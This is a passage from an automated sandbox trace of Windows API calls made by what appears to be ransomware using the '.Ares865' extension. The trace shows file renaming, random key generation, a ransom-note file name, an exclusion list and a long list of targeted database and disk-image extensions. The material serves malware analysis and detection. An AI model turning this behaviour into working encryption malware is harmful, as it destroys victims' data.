pictures\\usertile40.bmp.ares865"), dwFlags=0x1) returned 1 [0085.365] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0085.366] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0085.366] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0085.367] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0085.367] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0085.367] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0085.368] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0085.368] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.368] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0085.369] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.373] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.374] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.374] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0085.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0085.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.374] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.375] CloseHandle (hObject=0x15c) returned 1 [0085.375] CloseHandle (hObject=0x118) returned 1 [0085.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.375] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.376] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae62d7e6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae62d7e6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xddcc30b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile41.bmp", cAlternateFileName="")) returned 1 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2="aoldtz.exe") returned 1 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2=".") returned 1 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2="..") returned 1 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2="windows") returned -1 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2="bootmgr") returned 1 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2="temp") returned 1 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2="pagefile.sys") returned 1 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2="boot") returned 1 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2="ids.txt") returned 1 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2="ntuser.dat") returned 1 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2="perflogs") returned 1 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2="MSBuild") returned 1 [0085.376] lstrlenW (lpString="usertile41.bmp") returned 14 [0085.376] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp") returned 82 [0085.376] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile41.bmp" | out: lpString1="usertile41.bmp") returned="usertile41.bmp" [0085.376] lstrlenW (lpString="usertile41.bmp") returned 14 [0085.376] lstrlenW (lpString="Ares865") returned 7 [0085.376] lstrcmpiW (lpString1="e41.bmp", lpString2="Ares865") returned 1 [0085.376] lstrlenW (lpString=".dll") returned 4 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2=".dll") returned 1 [0085.376] lstrlenW (lpString=".lnk") returned 4 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2=".lnk") returned 1 [0085.376] lstrlenW (lpString=".ini") returned 4 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2=".ini") returned 1 [0085.376] lstrlenW (lpString=".sys") returned 4 [0085.376] lstrcmpiW (lpString1="usertile41.bmp", lpString2=".sys") returned 1 [0085.376] lstrlenW (lpString="usertile41.bmp") returned 14 [0085.376] lstrlenW (lpString="bak") returned 3 [0085.376] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.376] lstrlenW (lpString="ba_") returned 3 [0085.376] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.376] lstrlenW (lpString="dbb") returned 3 [0085.376] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.377] lstrlenW (lpString="vmdk") returned 4 [0085.377] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.377] lstrlenW (lpString="rar") returned 3 [0085.377] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.377] lstrlenW (lpString="zip") returned 3 [0085.377] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.377] lstrlenW (lpString="tgz") returned 3 [0085.377] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.377] lstrlenW (lpString="vbox") returned 4 [0085.377] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.377] lstrlenW (lpString="vdi") returned 3 [0085.377] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.377] lstrlenW (lpString="vhd") returned 3 [0085.377] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.377] lstrlenW (lpString="vhdx") returned 4 [0085.377] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.377] lstrlenW (lpString="avhd") returned 4 [0085.377] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.377] lstrlenW (lpString="db") returned 2 [0085.377] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.377] lstrlenW (lpString="db2") returned 3 [0085.377] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.377] lstrlenW (lpString="db3") returned 3 [0085.377] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.377] lstrlenW (lpString="dbf") returned 3 [0085.377] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.377] lstrlenW (lpString="mdf") returned 3 [0085.377] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.377] lstrlenW (lpString="mdb") returned 3 [0085.377] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.377] lstrlenW (lpString="sql") returned 3 [0085.377] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.377] lstrlenW (lpString="sqlite") returned 6 [0085.377] lstrcmpiW (lpString1="41.bmp", lpString2="sqlite") returned -1 [0085.377] lstrlenW (lpString="sqlite3") returned 7 [0085.377] lstrcmpiW (lpString1="e41.bmp", lpString2="sqlite3") returned -1 [0085.378] lstrlenW (lpString="sqlitedb") returned 8 [0085.378] lstrcmpiW (lpString1="le41.bmp", lpString2="sqlitedb") returned -1 [0085.378] lstrlenW (lpString="xml") returned 3 [0085.378] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.378] lstrlenW (lpString="$er") returned 3 [0085.378] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.378] lstrlenW (lpString="4dd") returned 3 [0085.378] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.378] lstrlenW (lpString="4dl") returned 3 [0085.378] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.378] lstrlenW (lpString="^^^") returned 3 [0085.378] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.378] lstrlenW (lpString="abs") returned 3 [0085.378] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.378] lstrlenW (lpString="abx") returned 3 [0085.378] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.378] lstrlenW (lpString="accdb") returned 5 [0085.378] lstrcmpiW (lpString1="1.bmp", lpString2="accdb") returned -1 [0085.378] lstrlenW (lpString="accdc") returned 5 [0085.378] lstrcmpiW (lpString1="1.bmp", lpString2="accdc") returned -1 [0085.378] lstrlenW (lpString="accde") returned 5 [0085.378] lstrcmpiW (lpString1="1.bmp", lpString2="accde") returned -1 [0085.378] lstrlenW (lpString="accdr") returned 5 [0085.378] lstrcmpiW (lpString1="1.bmp", lpString2="accdr") returned -1 [0085.378] lstrlenW (lpString="accdt") returned 5 [0085.378] lstrcmpiW (lpString1="1.bmp", lpString2="accdt") returned -1 [0085.378] lstrlenW (lpString="accdw") returned 5 [0085.378] lstrcmpiW (lpString1="1.bmp", lpString2="accdw") returned -1 [0085.378] lstrlenW (lpString="accft") returned 5 [0085.378] lstrcmpiW (lpString1="1.bmp", lpString2="accft") returned -1 [0085.378] lstrlenW (lpString="adb") returned 3 [0085.378] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.378] lstrlenW (lpString="adb") returned 3 [0085.378] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.378] lstrlenW (lpString="ade") returned 3 [0085.378] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.378] lstrlenW (lpString="adf") returned 3 [0085.379] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.379] lstrlenW (lpString="adn") returned 3 [0085.379] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.379] lstrlenW (lpString="adp") returned 3 [0085.379] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.379] lstrlenW (lpString="alf") returned 3 [0085.379] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.379] lstrlenW (lpString="ask") returned 3 [0085.379] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.379] lstrlenW (lpString="btr") returned 3 [0085.379] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.379] lstrlenW (lpString="cat") returned 3 [0085.379] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.379] lstrlenW (lpString="cdb") returned 3 [0085.379] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.379] lstrlenW (lpString="ckp") returned 3 [0085.379] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.379] lstrlenW (lpString="cma") returned 3 [0085.379] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.379] lstrlenW (lpString="cpd") returned 3 [0085.379] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.379] lstrlenW (lpString="dacpac") returned 6 [0085.379] lstrcmpiW (lpString1="41.bmp", lpString2="dacpac") returned -1 [0085.379] lstrlenW (lpString="dad") returned 3 [0085.379] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.379] lstrlenW (lpString="dadiagrams") returned 10 [0085.379] lstrcmpiW (lpString1="tile41.bmp", lpString2="dadiagrams") returned 1 [0085.379] lstrlenW (lpString="daschema") returned 8 [0085.379] lstrcmpiW (lpString1="le41.bmp", lpString2="daschema") returned 1 [0085.379] lstrlenW (lpString="db-journal") returned 10 [0085.379] lstrcmpiW (lpString1="tile41.bmp", lpString2="db-journal") returned 1 [0085.379] lstrlenW (lpString="db-shm") returned 6 [0085.379] lstrcmpiW (lpString1="41.bmp", lpString2="db-shm") returned -1 [0085.379] lstrlenW (lpString="db-wal") returned 6 [0085.379] lstrcmpiW (lpString1="41.bmp", lpString2="db-wal") returned -1 [0085.379] lstrlenW (lpString="dbc") returned 3 [0085.379] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.380] lstrlenW (lpString="dbs") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.380] lstrlenW (lpString="dbt") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.380] lstrlenW (lpString="dbv") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.380] lstrlenW (lpString="dbx") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.380] lstrlenW (lpString="dcb") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.380] lstrlenW (lpString="dct") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.380] lstrlenW (lpString="dcx") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.380] lstrlenW (lpString="ddl") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.380] lstrlenW (lpString="dlis") returned 4 [0085.380] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.380] lstrlenW (lpString="dp1") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.380] lstrlenW (lpString="dqy") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.380] lstrlenW (lpString="dsk") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.380] lstrlenW (lpString="dsn") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.380] lstrlenW (lpString="dtsx") returned 4 [0085.380] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.380] lstrlenW (lpString="dxl") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.380] lstrlenW (lpString="eco") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.380] lstrlenW (lpString="ecx") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.380] lstrlenW (lpString="edb") returned 3 [0085.380] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.380] lstrlenW (lpString="epim") returned 4 [0085.381] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.381] lstrlenW (lpString="fcd") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.381] lstrlenW (lpString="fdb") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.381] lstrlenW (lpString="fic") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.381] lstrlenW (lpString="flexolibrary") returned 12 [0085.381] lstrcmpiW (lpString1="ertile41.bmp", lpString2="flexolibrary") returned -1 [0085.381] lstrlenW (lpString="fm5") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.381] lstrlenW (lpString="fmp") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.381] lstrlenW (lpString="fmp12") returned 5 [0085.381] lstrcmpiW (lpString1="1.bmp", lpString2="fmp12") returned -1 [0085.381] lstrlenW (lpString="fmpsl") returned 5 [0085.381] lstrcmpiW (lpString1="1.bmp", lpString2="fmpsl") returned -1 [0085.381] lstrlenW (lpString="fol") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.381] lstrlenW (lpString="fp3") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.381] lstrlenW (lpString="fp4") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.381] lstrlenW (lpString="fp5") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.381] lstrlenW (lpString="fp7") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.381] lstrlenW (lpString="fpt") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.381] lstrlenW (lpString="frm") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.381] lstrlenW (lpString="gdb") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.381] lstrlenW (lpString="gdb") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.381] lstrlenW (lpString="grdb") returned 4 [0085.381] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.381] lstrlenW (lpString="gwi") returned 3 [0085.381] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.382] lstrlenW (lpString="hdb") returned 3 [0085.382] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0085.382] lstrlenW (lpString="his") returned 3 [0085.382] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.382] lstrlenW (lpString="ib") returned 2 [0085.382] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.382] lstrlenW (lpString="idb") returned 3 [0085.382] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.382] lstrlenW (lpString="ihx") returned 3 [0085.382] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.382] lstrlenW (lpString="itdb") returned 4 [0085.382] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.382] lstrlenW (lpString="itw") returned 3 [0085.382] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.382] lstrlenW (lpString="jet") returned 3 [0085.382] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.382] lstrlenW (lpString="jtx") returned 3 [0085.382] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.382] lstrlenW (lpString="kdb") returned 3 [0085.382] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.382] lstrlenW (lpString="kexi") returned 4 [0085.382] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.382] lstrlenW (lpString="kexic") returned 5 [0085.382] lstrcmpiW (lpString1="1.bmp", lpString2="kexic") returned -1 [0085.382] lstrlenW (lpString="kexis") returned 5 [0085.382] lstrcmpiW (lpString1="1.bmp", lpString2="kexis") returned -1 [0085.382] lstrlenW (lpString="lgc") returned 3 [0085.382] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0085.382] lstrlenW (lpString="lwx") returned 3 [0085.382] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0085.382] lstrlenW (lpString="maf") returned 3 [0085.382] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0085.382] lstrlenW (lpString="maq") returned 3 [0085.382] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0085.382] lstrlenW (lpString="mar") returned 3 [0085.382] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0085.382] lstrlenW (lpString="marshal") returned 7 [0085.383] lstrcmpiW (lpString1="e41.bmp", lpString2="marshal") returned -1 [0085.383] lstrlenW (lpString="mas") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0085.383] lstrlenW (lpString="mav") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0085.383] lstrlenW (lpString="maw") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0085.383] lstrlenW (lpString="mdbhtml") returned 7 [0085.383] lstrcmpiW (lpString1="e41.bmp", lpString2="mdbhtml") returned -1 [0085.383] lstrlenW (lpString="mdn") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0085.383] lstrlenW (lpString="mdt") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0085.383] lstrlenW (lpString="mfd") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0085.383] lstrlenW (lpString="mpd") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0085.383] lstrlenW (lpString="mrg") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0085.383] lstrlenW (lpString="mud") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0085.383] lstrlenW (lpString="mwb") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0085.383] lstrlenW (lpString="myd") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0085.383] lstrlenW (lpString="ndf") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0085.383] lstrlenW (lpString="nnt") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0085.383] lstrlenW (lpString="nrmlib") returned 6 [0085.383] lstrcmpiW (lpString1="41.bmp", lpString2="nrmlib") returned -1 [0085.383] lstrlenW (lpString="ns2") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0085.383] lstrlenW (lpString="ns3") returned 3 [0085.383] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0085.383] lstrlenW (lpString="ns4") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0085.384] lstrlenW (lpString="nsf") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0085.384] lstrlenW (lpString="nv") returned 2 [0085.384] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0085.384] lstrlenW (lpString="nv2") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0085.384] lstrlenW (lpString="nwdb") returned 4 [0085.384] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0085.384] lstrlenW (lpString="nyf") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0085.384] lstrlenW (lpString="odb") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.384] lstrlenW (lpString="odb") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0085.384] lstrlenW (lpString="oqy") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0085.384] lstrlenW (lpString="ora") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0085.384] lstrlenW (lpString="orx") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0085.384] lstrlenW (lpString="owc") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0085.384] lstrlenW (lpString="p96") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0085.384] lstrlenW (lpString="p97") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0085.384] lstrlenW (lpString="pan") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0085.384] lstrlenW (lpString="pdb") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0085.384] lstrlenW (lpString="pdm") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0085.384] lstrlenW (lpString="pnz") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0085.384] lstrlenW (lpString="qry") returned 3 [0085.384] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0085.385] lstrlenW (lpString="qvd") returned 3 [0085.385] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0085.385] lstrlenW (lpString="rbf") returned 3 [0085.385] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0085.385] lstrlenW (lpString="rctd") returned 4 [0085.385] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0085.385] lstrlenW (lpString="rod") returned 3 [0085.385] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0085.385] lstrlenW (lpString="rodx") returned 4 [0085.385] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0085.385] lstrlenW (lpString="rpd") returned 3 [0085.385] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0085.385] lstrlenW (lpString="rsd") returned 3 [0085.385] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0085.385] lstrlenW (lpString="sas7bdat") returned 8 [0085.385] lstrcmpiW (lpString1="le41.bmp", lpString2="sas7bdat") returned -1 [0085.385] lstrlenW (lpString="sbf") returned 3 [0085.385] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0085.385] lstrlenW (lpString="scx") returned 3 [0085.385] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0085.385] lstrlenW (lpString="sdb") returned 3 [0085.385] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0085.385] lstrlenW (lpString="sdc") returned 3 [0085.385] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0085.385] lstrlenW (lpString="sdf") returned 3 [0085.385] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0085.385] lstrlenW (lpString="sis") returned 3 [0085.385] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0085.385] lstrlenW (lpString="spq") returned 3 [0085.385] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0085.385] lstrlenW (lpString="te") returned 2 [0085.385] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0085.385] lstrlenW (lpString="teacher") returned 7 [0085.385] lstrcmpiW (lpString1="e41.bmp", lpString2="teacher") returned -1 [0085.385] lstrlenW (lpString="tmd") returned 3 [0085.385] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0085.385] lstrlenW (lpString="tps") returned 3 [0085.385] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0085.385] lstrlenW (lpString="trc") returned 3 [0085.386] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.386] lstrlenW (lpString="trc") returned 3 [0085.386] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0085.386] lstrlenW (lpString="trm") returned 3 [0085.386] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0085.386] lstrlenW (lpString="udb") returned 3 [0085.386] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0085.386] lstrlenW (lpString="udl") returned 3 [0085.386] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0085.386] lstrlenW (lpString="usr") returned 3 [0085.386] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0085.386] lstrlenW (lpString="v12") returned 3 [0085.386] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0085.386] lstrlenW (lpString="vis") returned 3 [0085.386] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0085.386] lstrlenW (lpString="vpd") returned 3 [0085.386] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0085.386] lstrlenW 